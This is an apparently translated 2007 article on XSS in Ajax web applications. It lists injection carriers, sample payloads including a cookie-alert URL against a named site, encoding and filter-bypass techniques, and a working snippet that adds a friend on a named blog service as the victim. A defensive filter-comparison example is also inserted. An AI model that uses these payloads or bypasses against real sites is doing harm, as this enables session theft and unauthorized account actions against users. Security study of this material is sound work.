Ajax hacking (Monyer)-vulnerability warning-the black bar safety net

ID MYHACK58:62200713733
Type myhack58
Reporter Anonymous
Modified 2007-01-12T00:00:00


Author: dream light

Since the Ajax hacking article was published in issue ten, readers have sent me feedback on its XSS side, mainly along these lines: what is XSS used for in Ajax hacking? How does it differ from traditional XSS? What are the strengths and weaknesses of each? Are the so-called XSS vulnerabilities on large sites of little real value? Let us analyse these questions in detail.

Ajax hacking

The term Ajax hacking first appeared in Billy Hoffman's report AJAX Dangers, where he defined attacks of the Samy and Yamanner kind as AJAX hacking. Before that they were simply called Web 2.0 worms or XSS worms, and there was no clear definition of this form of attack. Here we will tentatively discuss XSS within Ajax hacking in some depth. For other forms of Ajax attack, see the online article Top 10 Ajax Security Holes and Driving Factors, or its Chinese translation, the breakdown of the ten security threats under Web 2.0.

In a traditional XSS attack the goal is usually to gain privileges directly, or to gain them after stealing cookies, so the code is typically implemented with window.open, window.location or an iframe. Two big weaknesses follow from this: it does not propagate, and it is easily exposed. In Ajax hacking, the use of this new technology changes both the attack method and the target. In practice, the vast majority of people who obtain administrator permissions and file permissions do nothing more than plant a trojan on the pages; very few go after trade secrets. This form of attack instead points the spear directly at the client: because all data is transferred asynchronously it is highly covert; by acting with the logged-on user's permissions it can change that user's information directly; and the code can even be made to propagate automatically, giving it worm functionality.

XSS use

In a propagating XSS attack, the code is usually inserted through the URL and the textarea. But for the many sites recently built on Ajax technology, the new Ajax hacking techniques extend the usable carriers to seven: the URL field, input fields, textarea fields, the embed element, CSS, RSS and XML.


A URL open to XSS generally has the form "domain name/file name.extension?(field)=(field content)", and the field content is usually displayed or called at some position on the page. Because the site developer neglected to check and filter that field's content and passed it straight to the page, we only need to replace the field content with the XSS code we want in order to create a cross-site script. For example:

http://club.sohu.com/joke/1.htm?stra=<script>alert(document.cookie);</script>

However, this approach generally requires convincing a user to click a link you forged beforehand; the link can be posted in a forum or sent by e-mail as a phishing lure.

Input and textarea and css XSS

Input, textarea and CSS XSS are the methods we use most widely. Since CSS is really part of DHTML, their usage and their filter-bypass characteristics are largely the same; we will focus on explaining and experimenting with them later.

Embed XSS

Embed XSS is generally used on sites that allow video, music and Flash to be inserted. If you link to a maliciously constructed Flash file containing an XSS script, for example <EMBED SRC="xss.swf"></EMBED>, where the specially constructed .swf file's actions contain ActionScript that leads to JS or VBS code, a cross-site script fires when the user visits the page.

Rss and Xml XSS

This attack is generally used against sites that aggregate RSS, and against some local RSS readers; XSS against a local RSS reader may even make it possible to obtain permissions on the host, though I have not tried this. Because RSS files can generally be referenced from any site, testing such an attack is very simple, and the effect is quite obvious. Below is an instance of a local reader calling a remote rss.xml without any filtering, together with the filtering effect when Google calls the RSS.

Code insert mode

Because the inserted script is JS or VBS, the keywords JavaScript, VbScript or expression are generally needed, as in <IMG SRC="javascript:alert('XSS');">. But when responding to a mouse or keyboard event these three keywords can be omitted, as in <img onmouseover="alert('XSS');"> or <INPUT onkeyup="alert('XSS');">. And because HTML does not follow the XHTML standard, the following insertion methods are also available:

1. Tag attributes can be written with double quotes, with single quotes, or with no quotes at all;

2. Attribute values can be upper case, lower case, or mixed;

3. Carriage returns can be inserted, including both the end-of-paragraph and newline characters, i.e. char(10) and char(13), as well as tab and space;

4. In style attributes a backslash "\" and the comment operator "/**/" can also be inserted;

5. The inserted code can be converted to decimal or hexadecimal;

6. Because what is forbidden is uncertain, the hexadecimal strings you insert can be converted in a series of ways and mixed and matched;

7. The character "j" has the following 15 encodings, and the character is not case sensitive.

\6A\06A\006A\0006A\00006A   //hexadecimal encoding in the JavaScript/CSS form

&#106;&#0106;&#00106;&#000106;&#0000106;   //decimal HTML entity encoding

&#x6A;&#x06A;&#x006A;&#x0006A;&#x00006A;   //hexadecimal HTML entity encoding

8. Other encoding methods, such as htmlEncode and URLEncode for HTML and URL encoding.

As for which HTML tags the code can be inserted into... that question nearly drove me mad. Currently the code can be inserted into the attributes of almost any tag, for example <b style="xss:expression(alert('XSS'))">.

The attributes of HTML tags in which code can generally be inserted are: src; style; dynsrc (commonly used in img and input, and this attribute can also insert video); lowsrc (pre-load thumbnail); mouse attributes such as onmouseover; keyboard attributes such as onkeypress; the href attribute commonly used in a and link; the body onload attribute; the URL attribute; and so on.

Filter bypass mode

Of course no site is so dumb as to let you enter these codes unchecked; they generally filter the characters you enter. So the code we wrote may not be inserted and executed smoothly; some key characters, such as "JavaScript", are likely filtered out. If the filter is only this simple, bypassing it is really too easy: whenever you need this string, enter "javajavascriptscript" or the like. Of course a site programmer will not be so silly; they will filter in various ways to guard against you, so combining the "code insertion modes" above, the methods for bypassing a site's filter can be summarised as follows:

1. Padding with ASCII control characters

For example <IMG SRC="[control character]javascript:alert('XSS');"> (the control character itself was lost in extraction). If you are familiar with ASCII you will know there are 33 control characters in total; removing the head (null) and the tail (del), the other 31 can be inserted at the head of the code to confuse the filter without affecting execution of the original code, and you can still apply arbitrary conversions using "scheme 7" of "code insertion". Among them, tab, newline and carriage return can be inserted anywhere in the code.

2. Inserting a confusing attribute

When doing general text entry we find that not everything containing "JavaScript" is filtered out; only special characters inside HTML tags are filtered. This gives us a way around: before the attribute that carries the code, insert another confusing attribute, and inside it insert what the filter will mistake for the tag terminator, so that the filter believes the code sits outside the HTML tag. For example:

<img src="abc>" >   //a confusing src attribute

<IMG """><SCRIPT>[code]</SCRIPT>">   //confusing double quotes and the ">" symbol

<SCRIPT a=">" SRC="xss.js"></SCRIPT>   //a confusing attribute a

3. Splitting with comment characters

Because the browser ignores comment characters, splitting the code with comments can deceive the filter without affecting the XSS code's execution. For example:

<img style="xss:expr/*XSS*/ession([code])">   //the CSS comment symbol is /**/; its content is ignored

<style>@im\port'\ja\vasc\ript:alert("XSS")';</style>   //CSS ignores the "\" symbol

exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>   //comments made deliberately confusing

<style><!--</style><script>[code]//--></script>   //the HTML comment identifier is <!-- comment -->

4. JS encoding and external calls

If the filter removes many of the characteristic characters, the bypasses above become very troublesome, so the typical scheme is to encode the code in JS, or simply to call it from an external file. Of course, because of the browser's security restrictions on Ajax, you must ensure the called file is on the same server, otherwise an error message appears.
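As an added example (not code from the original article), the following JavaScript contrasts a naive keyword filter with one that canonicalises the value first, run over constructed samples of the encoding, comment-splitting and control-character forms described in the two sections above; the decoding steps and sample values are this example's own assumptions.

```javascript
// Added example: a filter that matches keywords on the raw value versus one
// that canonicalises first. Decode steps are assumptions about what a
// sanitiser needs, not the article's own filter code.

const DANGEROUS = /javascript:|vbscript:|expression\s*\(|\bon\w+\s*=/i;

// Naive filter: looks for the keywords in the raw attribute value only.
function naiveFilter(value) {
  return DANGEROUS.test(value);
}

// Decode one layer: HTML numeric entities (&#106; &#0106; &#x6A; ...) and
// CSS/JS backslash-hex escapes (\6A \006A ...) become characters; a backslash
// before a non-hex character is dropped, as CSS does with \j \v \r.
function decodeOnce(s) {
  return s
    .replace(/&#x([0-9a-f]{1,6});?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d{1,7});?/g, (_, d) => String.fromCharCode(parseInt(d, 10)))
    .replace(/\\([0-9a-f]{1,6})\s?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\(?=[^0-9a-f])/gi, '');
}

// Canonicalise: decode until stable (encodings can be nested), strip CSS
// comments and ASCII control characters, then lower-case.
function canonicalise(value) {
  let prev, s = value;
  do { prev = s; s = decodeOnce(s); } while (s !== prev);
  s = s.replace(/\/\*[\s\S]*?\*\//g, '');   // remove /* ... */
  s = s.replace(/[\x00-\x1f\x7f]/g, '');    // drop control chars incl. tab/CR/LF
  return s.toLowerCase();
}

// Hardened filter: the same keyword test, but on the canonical form.
function hardenedFilter(value) {
  return naiveFilter(canonicalise(value));
}

// Constructed samples in the forms the text discusses.
const SAMPLES = [
  '<IMG SRC="jav\tascript:alert(\'XSS\');">',                    // tab padding
  '<IMG SRC="&#106;&#97;&#118;&#97;script:alert(\'XSS\');">',   // decimal entities
  '<img style="xss:expr/*XSS*/ession(alert(\'XSS\'))">',        // CSS comment split
  '<style>@im\\port\'\\ja\\vasc\\ript:alert("XSS")\';</style>', // backslashes
  '<a href="https://example.com/page?q=1">link</a>',            // benign
];

function report() {
  return SAMPLES.map((v) => ({ naive: naiveFilter(v), hardened: hardenedFilter(v) }));
}
```

The first four samples pass the naive filter and are caught only by the hardened one, while the benign link passes both.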

Asynchronous data call

Since this is Ajax hacking, asynchronous data calls are naturally needed. Here I only introduce the relevant knowledge briefly; a deeper understanding is the result of long-term practice.

1. Declaring the XMLHttpRequest object

The data call first requires declaring the XMLHttpRequest object. In IE6 and earlier the simplest approach is:

var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");

In IE7 and Firefox the declaration is:

var req = new XMLHttpRequest();

So if we want to write more compatible code, we can detect the client browser and then define the XMLHttpRequest object accordingly, as follows:

var XmlHttp;
if (window.XMLHttpRequest) {
  XmlHttp = new XMLHttpRequest();            //IE7, Firefox and others
} else if (window.ActiveXObject) {
  XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");   //IE6 and earlier
}

Then pass the parameters with:

XmlHttp.open("POST", "URL", true); XmlHttp.send(null);

The idea is that the first argument of XmlHttp.open is the request method for the page, one of POST, GET or HEAD; the third argument true means asynchronous mode, false means synchronous mode.

With the code above you can simply add any user as a friend of the currently logged-in user on the TOM blog: if the addition succeeds the window returns OK, and if the user has already been added it returns "already friends". The code is:

<script>
var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
XmlHttp.onreadystatechange = ServerProcess;   //register the callback before sending
XmlHttp.open("POST", "http://blog.tom.com/manage/favorite/friend_list.php?UserName=monyer1&Flag=1", true);
XmlHttp.send(null);
function ServerProcess() {
  if (XmlHttp.readyState == 4 || XmlHttp.readyState == 'complete')
    alert(XmlHttp.responseText);   //show the server's reply
}
</script>

By the same principle, posting an article as the logged-in user is no problem either, just a little more trouble; interested readers can go back and try it themselves.

Declaring XMLHttpRequest in VBScript looks like this:

Dim httpreq
Set httpreq = CreateObject("Microsoft.XMLHTTP")
httpreq.open "POST", "URL", True
httpreq.setRequestHeader "Content-Type", "text/xml;charset=gb2312"
httpreq.send

Its usage is much the same as in JS, so I will not elaborate here.

2. Getting page elements

To get a specified tag and its value, the following DOM objects are generally used; the relevant attribute, such as style, value or innerHTML, can be appended to the object.

1) document.getElementById   //get information about the HTML tag with the specified id

2) document.getElementsByName   //get information about the HTML tags with the specified name

3) document.getElementsByTagName   //get information about the HTML tags of the specified name

3. Inserting HTML elements into the page

As far as I know, the JS functions that insert HTML into the page are insertAdjacentHTML and innerHTML (outerHTML), and insertAdjacentText and innerText (outerText). The first two insert HTML code and the latter two insert text, so we generally use the first two. The document object's createElement can also insert code. When entering JS code, note that names are case sensitive.

1) <a href="#">innerHTML</a>   //replaces the content of the current tag; the scope excludes the current HTML tag itself

2) <a href="#">outerHTML</a>   //replaces the current tag together with its content; the scope includes the current tag and everything in it

3) <a href="#">insertAdjacentHTML</a>   //inserts new HTML code without changing the original tag and its content

To specify where the HTML is inserted, four position values are available:

a. beforeBegin: insert before the element's start tag

b. afterBegin: insert after the element's start tag

c. beforeEnd: insert before the element's end tag

d. afterEnd: insert after the element's end tag

Flexible use of these two functions can help us produce rich effects. I used them to turn Baidu Space into a video player; the simplified POC is:

The HTML page code is:

<script src=monyerflash.js></script> <address>src=http://tv.mofile.com/cn/xplayer.swf?v=9IWKFISE</address>

The code of monyerflash.js is:

window.onload = function () {
  var i, j, x, y, z;
  j = document.getElementsByTagName('address');
  for (i = 0; i < j.length; i++) {
    y = j[i];
    z = j[i].firstChild.data;                 //the text "src=http://..." inside <address>
    x = '<br/><embed ' + z + '></embed>';
    if (y) y.insertAdjacentHTML('beforeEnd', x);   //append the embed inside the address element
  }
};

Summary

From the outline above, I believe you now have a general understanding of Ajax hacking with XSS, and with simple combinations and variations of what this text covers it is possible to do some amazing things. Of course, because Ajax applications are partly JavaScript, to use Ajax-style hacking to its full power you also need a thorough understanding of JavaScript. When battling each filtering system you will encounter more hardship and have to try to solve all sorts of problems. I think whether you actually compromise a site or successfully plant something on it is of secondary importance; constantly improving yourself and seeking breakthroughs in the contest between attack and defence is what counts!